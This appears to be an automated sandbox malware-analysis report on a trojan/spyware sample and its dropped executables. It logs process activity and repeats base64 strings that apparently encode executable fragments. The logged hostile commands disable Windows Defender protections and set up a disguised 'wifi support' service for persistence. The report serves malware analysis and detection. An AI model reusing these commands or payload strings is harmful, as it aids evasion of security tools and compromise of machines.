Source: 22.0.2531.exe.240000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 25.0.2531.exe.c20000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 25.2.2531.exe.c20000.1.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Base64 encoded string: 'VDataIDataParameterCollection20740FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUk3TWYrY0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjhBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZkFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEyR29CQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlI5QVFBQUFBQUFTQUFBQUFJQUJRQmdvZ0FBWk5vQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRDQVFBRUpTMFhKbjRCQVFBRS9nYkFBUUFHY3hBQUFBb2xnQUlCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT0lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFIQUFBQkpkRGFBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5Sd0FBQVNYUTN3QUFCQ2dVQUFBS2N4VUFBQXFpS01nQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2tCQUFZVEJIUHlBQUFHRXdVUkJINFlBQUFLZlFBQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRQUJBQVFSQkhzQUFRQUVIdytOUndBQUFTWFE2Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xSEFBQUJKZERWQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRb2dBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNBQVFBRUtNc0FBQVlyREJFRWV3QUJBQVFveWdBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0FBUUFFS01rQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1Z0FBQmhFRkVRZHY2QUFBQmhFRkVRVCtCcm9CQUFaekpRQUFDbjREQVFBRUpTMFhKbjRCQVFBRS9nYkJBUUFHY3lZQUFBb2xnQU1CQUFRb0FnQUFLMi9xQUFBR0VRVVJCUDRHdXdFQUJuTW5BQUFLZmdRQkFBUWxMUmNtZmdFQkFBVCtCc0lCQUFaek
Source: 1D31.exe, 3252.exe, 00000017.00000000.365110189.0000000000401000.00000020.00020000.sdmp Binary or memory string: \RRTexture.vbp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@66/113@27/9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\webgfvd Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:68:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Mutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4964:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe File created: C:\Users\user\AppData\Local\Temp\AE30.tmp Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: bNdOhKPy0F.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1D31.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3252.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: bNdOhKPy0F.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\bNdOhKPy0F.exe 'C:\Users\user\Desktop\bNdOhKPy0F.exe'
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Process created: C:\Users\user\Desktop\bNdOhKPy0F.exe 'C:\Users\user\Desktop\bNdOhKPy0F.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\webgfvd C:\Users\user\AppData\Roaming\webgfvd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1D31.exe C:\Users\user\AppData\Local\Temp\1D31.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3252.exe C:\Users\user\AppData\Local\Temp\3252.exe
Source: C:\Users\user\AppData\Roaming\webgfvd Process created: C:\Users\user\AppData\Roaming\webgfvd C:\Users\user\AppData\Roaming\webgfvd
Source: C:\Users\user\AppData\Local\Temp\2531.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4DAB.exe C:\Users\user\AppData\Local\Temp\4DAB.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5CDE.exe C:\Users\user\AppData\Local\Temp\5CDE.exe
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6ACA.exe C:\Users\user\AppData\Local\Temp\6ACA.exe
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Process created: C:\Windows\System\svchost.exe 'C:\Windows\System\svchost.exe' formal
Source: unknown Process created: C:\Users\user\AppData\Roaming\webgfvd C:\Users\user\AppData\Roaming\webgfvd
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\88A3.exe C:\Users\user\AppData\Local\Temp\88A3.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\hqoawywe\
Source: C:\Windows\System\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bquyobss.exe' C:\Windows\SysWOW64\hqoawywe\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create hqoawywe binPath= 'C:\Windows\SysWOW64\hqoawywe\bquyobss.exe /d\'C:\Users\user\AppData\Local\Temp\5CDE.exe\'' type= own start= auto DisplayName= 'wifi support'
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Process created: C:\Users\user\Desktop\bNdOhKPy0F.exe 'C:\Users\user\Desktop\bNdOhKPy0F.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1D31.exe C:\Users\user\AppData\Local\Temp\1D31.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2531.exe C:\Users\user\AppData\Local\Temp\2531.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3252.exe C:\Users\user\AppData\Local\Temp\3252.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4DAB.exe C:\Users\user\AppData\Local\Temp\4DAB.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5CDE.exe C:\Users\user\AppData\Local\Temp\5CDE.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6ACA.exe C:\Users\user\AppData\Local\Temp\6ACA.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\88A3.exe C:\Users\user\AppData\Local\Temp\88A3.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
